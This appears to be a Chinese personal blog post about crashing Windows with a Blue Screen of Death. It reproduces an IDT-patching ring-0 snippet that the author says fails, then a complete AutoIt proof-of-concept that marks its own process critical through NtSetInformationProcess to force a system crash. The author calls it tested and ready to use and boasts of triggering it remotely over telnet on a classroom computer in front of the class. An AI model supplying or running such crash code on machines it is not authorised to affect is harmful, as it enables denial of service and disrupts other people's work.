Blue Screen of Death

我听说KeCheckBugEx可以引发BSOD

于是我就在网上找这个undocumented的函数

后来网上的代码我的确是 找到了 但是不知道怎样获得ring0特权

他们说可以这样做

//VS 2013编译通过
//Windows 8.1 64bit
//运行时访问非法内存

void Ring0Proc()  // 在Ring0中执行你自已的代码
{
// .......
asm mov eax,CR0;  // 试验一下Ring3不能执行的特权指令
// .......
}

void  __declspec(naked) NewInt() //新中断
{
Ring0Proc();
asm  iretd;
}
#define   IntNo   9
DWORDLONG   IDTR,SavedGate;
WORD OurGate[4]={0,0x0028,0xee00,0x0000};
void  GotoRing0()
{
asm
{
mov  eax,offset NewInt;
mov  [OurGate],ax;
shr  eax,16;
mov  [OurGate+6],ax;
sidt fword ptr IDTR;
mov  ebx,dword ptr [IDTR+2];
add  ebx,IntNo*8;
mov  edi,offset SavedGate;
mov  esi,ebx;
movsd;
movsd;
mov  edi,ebx;
mov  esi,offset OurGate;
movsd;
movsd;
int  IntNo;
mov  edi,ebx;  // 开始恢复原中断门
mov  esi,offset SavedGate;
movsd;
movsd;
}
}

void __fastcall TForm1::Button1Click(TObject *Sender)
{
GotoRing0();
}

其他编译器还识别不出asm

GG

....我突然想到是不是fastcall的问题我现在去试一下

//3分钟后

诶卧槽还真是fastcall

上面那段应该可用

我在本地的vs2013上试试(上面的测试是VC++6.0 on Windows Server 2003 Enterprise Edition)

吐槽下VS 还是一如既往的慢

//10分钟后 

还是非法内存 算了还是不试了

说说新发现

本来只是想给我的一个服务写上判断某制定进程是否被挂起

然后网上都说要用NtQuerySystemInformation

昨天花了一个下午

终于把上面那个函数弄出来了

然而 并没有什么卵用

【三岁好累

我再去试了下NtQueryInformationProcess

找了半天

把第一个枚举的弄出来了

结果仔细看了看

除了第一个

其他 好像没有什么我要的东西 【GG

//此乃后话 不表

接着 我就去查一个什么enum成员来着

就看到一个东西

起先我也不知道什么就随便点开来看

然后 竟然有BSOD的页面

我就去把那个程序下载下来

源代码如下:

#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Change2CUI=y
#AutoIt3Wrapper_Res_Comment=A PoC that will trigger a Blue Screen Of Death
#AutoIt3Wrapper_Res_Description=A PoC that will trigger a Blue Screen Of Death
#AutoIt3Wrapper_Res_Fileversion=1.0.0.0
#AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
; Sample by Joakim Schicht
#include <WinAPI.au3>
Global Const $tagOBJECTATTRIBUTES = "ulong Length;hwnd RootDirectory;ptr ObjectName;ulong Attributes;ptr SecurityDescriptor;ptr SecurityQualityOfService"
Global Const $OBJ_CASE_INSENSITIVE = 0x00000040
Global Const $tagUNICODESTRING = "ushort Length;ushort MaximumLength;ptr Buffer"
_SetPrivilege("SeDebugPrivilege")
$ProcId = DllCall("kernel32.dll", "dword", "GetCurrentProcessId")
If @error Then
ConsoleWrite("GetCurrentProcessId: " & _WinAPI_GetLastErrorMessage() & @CRLF)
Exit
EndIf
ConsoleWrite("PID: " & $ProcId[0] & @CRLF)
$Test = _SetProcessCritical($ProcId[0],1)
; You should now see the Blue Screen Of Death

Func _SetProcessCritical($PID, $Flag)
Local $sOA = DllStructCreate
4000
($tagOBJECTATTRIBUTES)
DllStructSetData($sOA, "Length", DllStructGetSize($sOA))
DllStructSetData($sOA, "RootDirectory", 0)
DllStructSetData($sOA, "ObjectName", 0)
DllStructSetData($sOA, "Attributes", $OBJ_CASE_INSENSITIVE)
DllStructSetData($sOA, "SecurityDescriptor", 0)
DllStructSetData($sOA, "SecurityQualityOfService", 0)
Local $ClientID = DllStructCreate("dword_ptr UniqueProcessId;dword_ptr UniqueThreadId")
DllStructSetData($ClientID, "UniqueProcessId", $PID)
DllStructSetData($ClientID, "UniqueThreadId", 0)
Local $aCall = DllCall("ntdll.dll", "hwnd", "NtOpenProcess", "handle*", 0, "dword", 0x001F0FFF, "struct*", $sOA, "struct*", $ClientID)
If Not NT_SUCCESS($aCall[0]) Then
Return SetError(1, 0, $aCall[0])
Else
$hProcess = $aCall[1]
EndIf
LOcal $SpecialStruct = DllStructCreate("dword")
DllStructSetData($SpecialStruct,1,$Flag)
$aCall = DllCall("ntdll.dll", "int", "NtSetInformationProcess", "handle", $hProcess, "dword", 29, "ptr", DllStructGetPtr($SpecialStruct),  "dword", DllStructGetSize($SpecialStruct))
If Not NT_SUCCESS($aCall[0]) Then
ConsoleWrite("Error in NtSetInformationProcess" & @CRLF)
Return SetError(1,0,$aCall[0])
EndIf
EndFunc

Func NT_SUCCESS($status)
If 0 <= $status And $status <= 0x7FFFFFFF Then
Return True
Else
Return False
EndIf
EndFunc

Func _SetPrivilege($Privilege)
Local $tagLUIDANDATTRIB = "int64 Luid;dword Attributes"
Local $count = 1
Local $tagTOKENPRIVILEGES = "dword PrivilegeCount;byte LUIDandATTRIB[" & $count * 12 & "]" ; count of LUID structs * sizeof LUID struct
Local $TOKEN_ADJUST_PRIVILEGES = 0x20
Local $SE_PRIVILEGE_ENABLED = 0x2

Local $curProc = DllCall("kernel32.dll", "ptr", "GetCurrentProcess")
Local $call = DllCall("advapi32.dll", "int", "OpenProcessToken", "ptr", $curProc[0], "dword", $TOKEN_ALL_ACCESS, "ptr*", "")
If Not $call[0] Then Return False
Local $hToken = $call[3]

$call = DllCall("advapi32.dll", "int", "LookupPrivilegeValue", "str", "", "str", $Privilege, "int64*", "")
Local $iLuid = $call[3]

Local $TP = DllStructCreate($tagTOKENPRIVILEGES)
Local $TPout = DllStructCreate($tagTOKENPRIVILEGES)
Local $LUID = DllStructCreate($tagLUIDANDATTRIB, DllStructGetPtr($TP, "LUIDandATTRIB"))

DllStructSetData($TP, "PrivilegeCount", $count)
DllStructSetData($LUID, "Luid", $iLuid)
DllStructSetData($LUID, "Attributes", $SE_PRIVILEGE_ENABLED)

$call = DllCall("advapi32.dll", "int", "AdjustTokenPrivileges", "ptr", $hToken, "int", 0, "ptr", DllStructGetPtr($TP), "dword", DllStructGetSize($TPout), "ptr", DllStructGetPtr($TPout), "dword*", 0)
$lasterror = _WinAPI_GetLastError()
If $lasterror <> 0 Then
ConsoleWrite("AdjustTokenPrivileges: " & _WinAPI_GetLastErrorMessage() & @CRLF)
EndIf
DllCall("kernel32.dll", "int", "CloseHandle", "ptr", $hToken)
Return ($call[0] <> 0) ; $call[0] <> 0 is success
EndFunc

代码片好像插不了??将就看看吧

后缀名是.au3

下载地址是这【好像不用翻*

要求管理员权限

反正就能直接用啦 亲测可用hhhhhhhhh

上课的时候可用telnet 遥控到教室电脑然后命令行调用

反正用的是本地监视器

所以 全班人都看得到咯hhhh

先到这傲 我还要去找情头

by:Mactvish

Copyright Mactvish

转载请注明出处

May 30th, 2015